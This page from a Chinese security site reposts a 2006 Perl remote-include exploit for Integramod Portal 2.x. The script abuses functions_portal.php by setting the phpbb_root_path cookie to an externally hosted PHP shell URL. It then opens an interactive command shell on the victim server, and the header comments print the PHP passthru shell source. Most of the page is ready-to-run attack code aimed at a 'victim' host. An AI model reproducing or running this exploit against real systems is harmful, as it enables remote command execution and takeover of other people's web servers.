首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Integramod Portal <= 2.x (functions_portal.php) Remote Include Exploit
来源:http://www.nukedx.com 作者:nukedx 发布时间:2006-08-24  

#!/usr/bin/perl
# Method found and exploit scripted by nukedx
# Contacts> ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: nukedx@nukedx.com
# Original advisory can be found at: http://www.nukedx.com/?viewdoc=47
#
# Integramod Portal <= 2.x Remote Command Execution Exploit
#
# This exploit comes with it's own php shell setting. If you wanna change it your file must contain this data >
#
# <?php
# echo "_START_\n";
# ini_set("max_execution_time",0);
# error_reporting(0);
# passthru($_REQUEST[command]);
# echo "\n_END_";
# ?>
#
# Copyright 2006 (C) nukedx
#
# Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Preddy , Yns , |SaMaN|, Caesar , Ogre and all of my friends
use IO::Socket;
# Default configuration
$shell = "http://hometown.aol.com/yarivgiladi/sh.php";
# Checking user settings
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-43\r\n";
print "- Integramod Portal<= 2.x Remote Command Execution Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to Integramod ex: /integra/ or just /\r\n";
exit();
}
sub exploit() {
# User variables
$host = $ARGV[0];
$host =~ s/(http:\/\/)//eg;
$target = $ARGV[1]."includes/functions_portal.php";
$good = 0;
$c2s = "command=whoami";
$c2slen = length($c2s);
print "Trying to connect: $host\r\n";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection failed...\r\n";
print "Connected to victim: $host\r\n";
print $sock "POST $target HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Referer: $host\r\n";
print $sock "Accept-Language: tr\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Accept-Encoding: gzip, deflate\r\n";
print $sock "User-Agent: NukeZilla\r\n";
print $sock "Cookie: phpbb_root_path=".$shell."?\r\n";
print $sock "Content-length: $c2slen\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "Cache-Control: no-cache\r\n\r\n";
print $sock $c2s;
print $sock "\r\n\r\n";
while($result = <$sock>)
{
if($result =~ /^_END_/)
{
$good=0;
close($sock);
}
if($good==1)
{
if (!$whoami) {
$whoami = trim($result);
print "Logged as $whoami\r\nType exit for exit dont press ctrl+c\r\n";
}
}
if ($good==0)
{
if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable...\r\nClosing exploit...\r\n";sleep(3);exit(); }
}
if($result =~ /^_START_/)
{
$good=1;
}
}
while()
{
print "[".$whoami."@".$host." /]\$ ";
while(<STDIN>)
{
$cmds=$_;
chomp($cmds);
last;
}
if ($cmds =~ /^exit/) { print "Closing exploit...\r\n";sleep(3);exit(); }
else { sendcmd(); }
}
}
sub sendcmd () {
$c2s = "command=".$cmds;
$c2slen = length($c2s);
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection lost...\r\n";
print $sock "POST $target HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Referer: $host\r\n";
print $sock "Accept-Language: tr\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Accept-Encoding: gzip, deflate\r\n";
print $sock "User-Agent: NukeZilla\r\n";
print $sock "Cookie: phpbb_root_path=".$shell."?\r\n";
print $sock "Content-length: $c2slen\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "Cache-Control: no-cache\r\n\r\n";
print $sock $c2s;
print $sock "\r\n\r\n";
while($result = <$sock>)
{
if($result =~ /^_END_/)
{
$good=0;
close($sock);
}
if($good==1)
{
print $result;
}
if ($good==0)
{
if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable or patched!...\r\nClosing exploit...\r\n";sleep(3);exit(); }
}
if($result =~ /^_START_/)
{
$good=1;
}
}
}
sub trim($)
{
my $string = shift;
$string =~ s/^\s+//;
$string =~ s/\s+$//;
return $string;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·phpBB All Topics Mod <= 1.5
·VistaBB <= 2.x (functions_m
·MercuryBoard <= 1.1.4 (User
·MDaemon POP3 Server < 9.06
·2wire Modems/Routers CRLF Deni
·AlberT-EasySite <= 1.0a5 (P
·MDaemon POP3 Server < 9.06
·iziContents <= RC6 GLOBALS[
·Mozilla Firefox <= 1.5.0.6
·CMS Frogss <= 0.4 (podpis)
·Simple Machines Forum <= 1.
·VMware 5.5.1 (ActiveX) Local B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved